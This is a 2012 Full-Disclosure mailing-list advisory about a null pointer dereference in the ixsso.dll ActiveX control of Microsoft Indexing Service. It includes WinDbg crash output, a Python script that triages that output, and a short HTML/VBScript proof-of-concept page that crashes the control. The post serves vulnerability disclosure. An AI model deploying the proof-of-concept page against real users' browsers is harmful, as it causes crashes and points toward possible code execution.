Message-ID: <CADe7mMdAweayCFKyC1yv+j6R+V-=RLgSVmT+6_aLV2_Dz6RiWQ@mail.gmail.com>
Date: Fri, 24 Aug 2012 01:57:42 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Microsoft Indexing Service Server-side null pointer dereference

Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference
Crash : http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: Windows XP SP3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@...il.com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller
-----------------------------------------------------------------------------------------
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08            mov     ecx,dword ptr [eax]  ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77

Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting
Address controls Code Flow starting at
ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)

The data from the faulting address is later used as the target for a branch.
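The report closes with the tool's reasoning in a single sentence. The Python below is an added example, not part of this post, that re-derives that verdict mechanically from the quoted register dump and basic block: it checks that the faulting load reads through a register equal to the faulting address (eax = 0, a null-pointer read, consistent with the PoC handing the method Nothing), then follows the loaded register (ecx) through the block until it is used by call dword ptr [ecx] at 65da3d4d. That second step is what separates a TaintedDataControlsCodeFlow verdict from a plain crash. The sample input is the advisory's own output; all function names are this example's.

```python
"""Crash triage for a WinDbg register dump plus !exploitable output (added
example, not from the advisory): re-derives the verdict by checking that the
faulting load goes through a register equal to the faulting address (0 -> null
dereference) and that the loaded value reaches an indirect call unmodified."""
import re

# Excerpt of the output quoted in the advisory, used as the sample input.
REPORT = """\
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0         nv up ei ng nz na pe nc
Exception Faulting Address: 0x0
Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
"""

GPR = r"e[a-d]x|e[sd]i|e[bs]p"
REG_RE = re.compile(r"\b(%s|eip)=([0-9a-f]{8})\b" % GPR)
INSN_RE = re.compile(r"^([0-9a-f]{8})\s+(\w+)\s*(.*)$")
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z /()-]*?):\s*(.+)$")
MEM_RE = re.compile(r"\[\s*(%s)" % GPR)


def parse_registers(text):
    """{register: value} from the 'eax=... ebx=...' dump lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}


def parse_fields(text):
    """{key: value} for the 'Key: value' lines of the report."""
    matches = (FIELD_RE.match(line.strip()) for line in text.splitlines())
    return {m.group(1).strip(): m.group(2).strip() for m in matches if m}


def parse_basic_block(text):
    """Instructions listed after 'Basic Block:' as (addr, mnemonic, operands)."""
    block = text.split("Basic Block:", 1)[1].split("\n\n", 1)[0]
    return [m.groups() for m in (INSN_RE.match(l.strip()) for l in block.splitlines()) if m]


def memory_base(operands):
    """Base register of the first memory operand: 'dword ptr [eax]' -> 'eax'."""
    m = MEM_RE.search(operands)
    return m.group(1) if m else None


def written_register(mnemonic, operands):
    """Register overwritten by the instruction, when its destination is a register."""
    dest = operands.split(",")[0].strip()
    return dest if mnemonic in ("mov", "lea", "pop", "xor") and re.fullmatch(GPR, dest) else None


def triage(report):
    """Re-derive the !exploitable verdict from the raw dump; returns a dict."""
    regs, fields, block = parse_registers(report), parse_fields(report), parse_basic_block(report)
    fault_addr = int(fields["Exception Faulting Address"], 16)
    idx = next(i for i, (addr, _, _) in enumerate(block) if int(addr, 16) == regs["eip"])
    _, mnemonic, operands = block[idx]
    base, dest = memory_base(operands), written_register(mnemonic, operands)
    result = {
        "faulting_register": base,
        "null_deref": base is not None and regs.get(base) == fault_addr == 0,
        "loaded_into": dest,
        "controls_code_flow": False,
        "call_address": None,
        "tool_classification": fields.get("Exploitability Classification"),
        "hash": fields.get("Exception Hash (Major/Minor)"),
    }
    # Follow the loaded register through the rest of the block: if it reaches an
    # indirect call or jmp before being overwritten, whatever sits at the faulting
    # address chooses the branch target (the tool's TaintedDataControlsCodeFlow).
    for addr, mnemonic, operands in block[idx + 1:]:
        if dest is None:
            break
        if mnemonic in ("call", "jmp") and memory_base(operands) == dest:
            result["controls_code_flow"], result["call_address"] = True, addr
            break
        if written_register(mnemonic, operands) == dest:
            break  # overwritten before any use as a branch target
    return result


if __name__ == "__main__":
    for key, value in triage(REPORT).items():
        print(f"{key}: {value}")
```

The Exception Hash field the parser keeps is the value to bucket repeated crashes on when many fuzzer or telemetry reports arrive for the same control; the derived fields tell a triager at a glance whether a given null-dereference report is a plain denial of service or one where the dereferenced value feeds a branch.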
--------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target'></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype  = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid     = "Cisso.CissoQuery"
argCount   = 1

Set arg1=Nothing

target.OnStartPage arg1
</script>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/